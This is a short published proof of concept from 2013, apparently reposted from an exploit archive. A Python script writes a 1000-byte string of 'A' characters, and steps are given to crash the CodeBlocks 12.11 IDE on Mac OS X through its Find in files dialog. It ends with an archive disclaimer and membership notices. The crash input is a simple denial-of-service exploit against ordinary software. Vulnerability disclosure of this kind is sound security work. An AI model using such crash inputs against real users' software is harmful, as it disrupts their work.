# Exploit Title: CodeBlocks 12.11 (Mac OS X) Crash POC # Date: 27-05-2013 # Exploit Author: ariarat # Vendor Homepage: http://www.codeblocks.org # Software Link: http://sourceforge.net/projects/codeblocks/files/Binaries/12.11/MacOS/codeblocks-12.11-mac.dmg # Version: 12.11 # Tested on: [ Mac OS X 10.7.5] #============================================================================================ # in Search -> Find in files... -> Text to search for: type any character! # *** path in [Search path] section must be blank *** #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python filename="string.txt" buffer = "\x41" * 1000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论